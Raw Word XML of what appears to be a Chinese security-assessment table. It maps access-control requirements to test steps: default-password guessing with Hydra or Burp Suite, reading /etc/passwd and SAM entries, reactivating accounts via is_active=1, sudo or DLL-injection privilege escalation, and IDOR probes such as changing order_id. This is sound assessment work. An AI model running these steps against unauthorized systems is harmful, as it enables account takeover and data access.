                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）使用Hydra或Burp Suite尝试常见默认密码（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>admin123</w:t>
            </w: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password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A25DCD8">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·测试系统是否强制首次登录修改默认口令（如未修改则允许直接登录）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09962536">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7ECA980B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="948055" cy="433705"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
                  <wp:docPr id="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0"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId5"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="948055" cy="433705"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="38CAB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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="241640AA">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4BB75B4">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269F39DB">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0F48D122">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3.配置文件审计</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="778BC2D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·检查系统配置文件（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>/etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>、Windows SAM文件）是否存在未删除的默认账户条目。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457B5AA1">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·验证服务配置文件（如Apache的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>httpd.conf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>、MySQL的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>my.cnf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）中是否禁用默认账户权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2850A4B0">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048AF1B1">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>目标系统核心配置文件受访问控制保护，测试过程中无法获取文件内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08B27677">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="955040" cy="483870"/>
                  <wp:effectExtent l="0" t="0" r="16510" b="11430"/>
                  <wp:docPr id="3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7"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId23"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="955040" cy="483870"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="226F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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5525DD18">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289FB2B8">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1197FDE2">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BC9C7A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4.云服务默认账户检查</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16FE4577">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·测试云平台（如AWS IAM用户、阿里云RAM账户）是否保留默认管理员账户。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EF3940E">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·验证云服务（如Kubernetes Dashboard、Redis）的默认访问令牌是否被修改。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3183A578">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2012802B">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="951230" cy="467995"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="8255"/>
                  <wp:docPr id="32"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8"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId24"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="951230" cy="467995"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3264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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69621782">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="732CB87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c）应及时删除或停用多余的、过期的账户，避免共享账户的存在；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15AD3F5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2.5存在测试帐号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E38C07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1.默认测试账户扫描</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05346FCA">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·使用字典（如test、demo）尝试登录，验证是否存在未删除的测试账户。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29395230">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4F62F6BD">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145F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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A21A6D9">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="380AA960">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C1099DA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A0DF9A3">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2.历史账户恢复测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73EAE8BB">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·尝试通过修改已禁用账户的状态参数（如`is_active=1`）重新激活账户。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15EF320A">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0740FBE5">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10AC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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40180B13">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="756DC0A6">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e）应由授权主体配置访问控制策略，访问控制策略规定主体对客体的访问规则；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E849DF6">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2.5.1本地用户提权。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BC27951">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1.本地权限漏洞利用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B52F27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·在系统本地执行提权命令（如sudo提权、DLL注入），验证是否限制普通用户权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="319E533F">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2AEF89D0">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376BF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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C1D5C88">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D73B123">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f）访问控制的粒度应达到主体为用户级或进程级，客体为文件、数据库表级；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AEAE4DA">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2.6垂直越权</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14DD0288">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2.7平行越权</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69F4BCB8">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2.8任意文件下载</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F83C436">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2.9目录遍历</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B1F7F6C">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2.10路径遍历</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43A8CCF8">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2.11管理后台对外</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5953F81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2.12同步错误</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F2C761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2.13环境错误</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24B566B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2.14 cookie设置不当</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F384815">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2.15 flash 配置不当</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BA1CFFD">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2.16中间件配置不当</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="722DEA3F">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2.17备份文件下载</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6525D535">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2.18不安全的HTTP请求方法2.19不安全对象直接引用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3974E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2.20 CSRF漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ADF0350">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2.21可预测的资源位置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D5AE6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2.22 XML外部实体（XXE）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A5F5C7C">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2.23 接口调用次数无限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61B26C5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1.垂直越权</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375C4007">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·使用普通账户尝试访问管理接口（如/admin/user/delete），验证是否返回403错误。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="150D52E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·通过修改URL路径（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>/user/profile</w:t>
            </w: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/admin/config</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）测试权限校验逻辑。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06B8E2A3">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45F8FB25">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="949325" cy="509270"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="508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5"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="949325" cy="509270"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0130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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="357A3278">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2BEEF911">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9D5C1FE">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C5BB148">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2.平行越权</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74ACEC4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·修改请求参数中的资源ID（如order_id=1001→</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>order_id=1002</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>），检查是否可操作他人数据。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="687FE551">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·利用API接口未绑定用户身份的特性，直接调用他人资源接口（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>GET /api/orders/1002</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D8D4F89">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326261E6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="946150" cy="476885"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="18415"/>
                  <wp:docPr id="3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4"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="946150" cy="476885"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
